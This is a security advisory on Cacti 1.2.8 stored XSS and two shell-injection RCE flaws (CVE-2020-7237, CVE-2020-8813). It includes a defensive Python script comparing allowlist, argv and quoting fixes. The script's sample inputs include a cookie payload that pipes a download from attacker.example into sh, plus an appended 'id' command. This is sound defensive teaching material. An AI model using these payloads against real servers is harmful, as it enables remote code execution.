cacti: Multiple vulnerabilities (CVE-2020-7106, CVE-2020-7237, CVE-2020-8813)
CVE-2020-7106: Lack of escaping on some pages can lead to XSS exposure
Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php, graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and user_group_admin.php, as demonstrated by the description parameter in data_sources.php (a raw string from the database that is displayed by $header to trigger the XSS).
References:
CVE-2020-7237: remote code execution due to missing input validation in the Performance Boost Debug Log setting
Cacti 1.2.8 allows Remote Code Execution (by privileged users) via shell metacharacters in the Performance Boost Debug Log field of poller_automation.php. OS commands are executed when a new poller cycle begins. The attacker must be authenticated, and must have access to modify the Performance Settings of the product.
References:
- https://ctrsec.io/index.php/2020/01/25/cve-2020-7237-remote-code-execution-in-cacti-rrdtool/
- https://github.com/Cacti/cacti/issues/3201
Patch:
https://github.com/Cacti/cacti/commit/5010719dbd160198be3e07bb994cf237e3af1308
CVE-2020-8813: remote code can be executed when guest users have access to realtime graphs
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
References:
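CVE-2020-7237 and CVE-2020-8813 share one root cause: a string the attacker controls (a stored Performance Settings value in the first case, a cookie in the second) is interpolated into a command line that is later handed to /bin/sh, so shell metacharacters in it become extra commands. The script below is an added illustration and is not Cacti's code; the command template, the sample setting and cookie values are constructed for the example. It shows how a shell would split the injected line, and contrasts the two standard fixes: allowlist validation plus an argv list that never goes through a shell, or, where a shell is unavoidable, quoting the value as a single word (shlex.quote here, escapeshellarg() in PHP).

```python
import re
import shlex

# Constructed sample values standing in for the two attacker-reachable inputs
# the advisory names. They are not real Cacti data.
SAMPLES = {
    "boost_log_ok": "/var/log/cacti/boost.log",                          # benign setting
    "boost_log_injected": "/var/log/cacti/boost.log; id > /tmp/pwned",   # CVE-2020-7237 style
    "cookie_injected": "5$(curl attacker.example/x|sh)",                  # CVE-2020-8813 style
}

# Hypothetical command template. The real command line Cacti builds is not
# shown on the advisory page and is not reproduced here.
TEMPLATE = "/usr/bin/tail -n 50 %s"

# Tokens that make sh start a new command (or a subshell).
SEPARATORS = {";", "|", "||", "&", "&&", "(", ")"}


def vulnerable_command(value):
    """The anti-pattern behind both CVEs: interpolate an attacker-reachable
    string straight into a line that /bin/sh will parse."""
    return TEMPLATE % value


def shell_segments(cmdline):
    """Split a shell line the way sh would, using shlex's punctuation mode,
    and return the list of separate commands it contains. A benign value
    yields exactly one segment; an injected one yields more."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    segments, current = [], []
    for tok in lexer:
        if tok in SEPARATORS:
            if current:
                segments.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        segments.append(current)
    return segments


# Fix 1: allowlist the setting and never let a shell see it.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9._/-]+$")


def validate_log_path(value):
    """A path-typed setting must be absolute and contain only characters a
    log path legitimately needs; everything else (spaces, ';', '$', quotes,
    '..' components) is rejected before any command is built."""
    if not SAFE_PATH.match(value) or ".." in value.split("/"):
        raise ValueError("rejected log path: %r" % value)
    return value


def hardened_argv(value):
    """Build argv for subprocess.run(argv, shell=False): the validated value
    is one argument and is never tokenised by a shell."""
    return ["/usr/bin/tail", "-n", "50", validate_log_path(value)]


# Fix 2: if a shell really is unavoidable, quote the value as a single word.
def quoted_for_shell(value):
    """shlex.quote() wraps the value in single quotes (PHP: escapeshellarg()),
    so metacharacters inside it stay literal."""
    return TEMPLATE % shlex.quote(value)


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        segs = shell_segments(vulnerable_command(value))
        print("%-20s unescaped -> %d command(s): %s" % (name, len(segs), segs))
        print("%-20s quoted    -> %d command(s)" % (name, len(shell_segments(quoted_for_shell(value)))))
        try:
            print("%-20s argv      -> %s" % (name, hardened_argv(value)))
        except ValueError as exc:
            print("%-20s argv      -> %s" % (name, exc))
```

The allowlist is the stronger of the two fixes for a setting like a log path: it rejects the malicious value outright instead of trusting the quoting, and it also stops path tricks that quoting alone would pass through. Quoting is the right tool for the cookie case only if the value has to reach a shell at all; passing an argv list with `shell=False` (or PHP's `proc_open` with an array command) avoids the shell entirely.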
Affected branches:
- master
- 3.11-stable (d257bf86)